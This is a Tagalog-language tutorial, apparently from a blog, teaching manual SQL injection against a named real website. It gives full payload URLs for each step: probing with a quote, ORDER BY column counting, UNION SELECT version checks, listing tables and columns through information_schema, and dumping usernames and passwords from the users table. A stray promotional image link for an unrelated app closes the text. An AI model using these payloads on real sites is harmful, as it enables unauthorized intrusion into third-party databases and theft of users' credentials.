NOTE: Paalala lang, matutong magbasa. Hindi po kasama yung quotation at yung parenthesis dito.
Una hanap ka ng vulnerable website
Try nateng 'tong isang 'to
Example:
http://www.celtiqueenergie.com/article.php?id=54
Pano malalaman kung vulnerable ang isang website sa Sql Injection?
Lagyan mo ng ( ' ) yung dulo. (Hindi kasama yung parenthesis.)
Edi ang lalabas:
http://www.celtiqueenergie.com/article.php?id=54'
Hit [Enter] Then may lalabas na ganito:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Okay, pwede ang website para sa test SQLi natin.
Next, hanapin ang tables ng website na target natin.
Delete mo yung ( ' ) at palitan mo ng "order by" (Hindi kasama yung parenthesis.)
tapos lagyan mo ng ( 10-- ) sa dulo. (Hindi kasama yung parenthesis.)
Ganito:
http://www.celtiqueenergie.com/article.php?id=54 order by 10--
http://www.celtiqueenergie.com/article.php?id=54 order by 20--
http://www.celtiqueenergie.com/article.php?id=54 order by 30--
Kapag may '30' in 'order clause' lumabas, bawasan mo ng bawasan hangang mawala yung "order clause"
So ang tamang tables ay 24--
http://www.celtiqueenergie.com/article.php?id=54 order by 24--
Next yung "order by" gawin nyong "union select" at lagyan nyo ng ( - ) (Hindi kasama yung parenthesis.) bago yung =58
Ganito:
SURIIN NYONG MABUTI.
Ganito kunware.
http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Hit [Enter] May mababasa kang ganito,
3
13,3 11 117
Yung naka BOLD na number yung lalagyan mo ng "@@version"
Ganito:
http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Hit [Enter] at may lalabas na ganto "5.1.46-log"
NOTE:
Tandaan nyo lagi na pag mas ma baba sa 5.0.0 log kunware 4.45.0- log LIPAT KA NA NG WEBSITE. HINDI PWEDE YANG VERSION NG SITE NA YAN KASE WALANG TABLE SCHEMA.
Next, palitan mo ng "group_concat (table_name)" yung "@@version" tapos sa dulo ng 24-- tanggalin mo na yung ( -- ) sa dulo pagkatapos palitan mo ng ganito:
from information_schema.tables wher table_schema=database()--
Ganito lalabas:
http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,group_concat (table_name),9,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables wher table_schema=database()--
May mababasa kayong ganito:
cont_lic_lu,content,content_types,countries,documents,fact_page_lu,fastfacts,hpitems,hpslides,itemtypes,languages,lic_holder_lu,lic_partner_lu,licences,links,locations,newsitems,operators,pages,pictures,sections,slides,slideshows, #users
Depende sa website kung ano lalabas. Yung target na tables, yung users tapos yung "group_concat" palitan nyo ng "group_concat (column_name) tapos yung dulo ng "from" delete nyo palitan nyo ng
"from information_schema.columns where table_schema=database ()--"
Ganito lalabas:
http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,group_concat (column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()--
Then finally, hanapin ang Username at Password kung natatandaan nyo pa yung #users yung target nating table dun mang-gagaling yung password and username
Heto na,
Yung (column_name) palitan ng (username,0x3a,password) tapos yung dulo ng FROM, DELETE nyo na, iwan mo lang yung FROM at lagay mo sa dulo yung target nating table, ganito yan:
http://www.celtiqueenergie.com/article.php?id=-54 union select 1,2,group_concat (username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users--
![Game Booster | Bug Fix & Lag Fix v5.6rs [Premium]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDNlV_bBqFQFY4IsW692wFsNvExC_0iWRugXUq31vqgokitWU8bbZ3AQHVr_IVn3UONl2mUKWtPXdglvaxvZ06pYjU-Nu9ISxVjDm7JxVfJsek2DSNq1ijaT3C5JHQ5TjjOhKAC4hEEG8/w680/Screenshot_2021-01-30-17-01-59-77.jpg)
